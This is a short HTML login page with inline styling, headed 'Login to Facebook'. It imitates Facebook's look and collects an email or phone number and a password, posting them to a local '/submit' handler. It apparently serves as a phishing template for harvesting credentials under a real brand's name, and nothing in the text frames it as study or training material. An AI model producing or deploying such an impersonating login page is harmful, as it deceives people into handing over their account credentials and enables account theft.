<!DOCTYPE html>
<html>
<head>
  <title>Login</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f0f2f5;
      margin: 0;
      padding: 0;
    }
    
    .container {
      max-width: 400px;
      margin: 100px auto;
      background-color: #fff;
      border-radius: 5px;
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
      padding: 20px;
      text-align: center;
    }
    
    h2 {
      font-size: 28px;
      margin-bottom: 20px;
    }
    
    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 12px;
      border: 1px solid #ddd;
      margin-bottom: 10px;
      border-radius: 3px;
      box-sizing: border-box;
    }
    
    input[type="submit"] {
      background-color: #1877f2;
      color: #fff;
      border: none;
      padding: 12px 20px;
      border-radius: 3px;
      font-size: 16px;
      cursor: pointer;
    }
    
    input[type="submit"]:hover {
      background-color: #0e63ad;
    }
  </style>
</head>
<body>
  <div class="container">
    <h2>Login to Facebook</h2>
    <form action="/submit" method="POST">
      
      <input type="text"  id="username" name="username"  placeholder="Email or Phone" required>

      <input type="password" id="password" name="password" placeholder="Password" required>
      <input type="submit" value="Log In">
    </form>
  </div>
</body>
</html>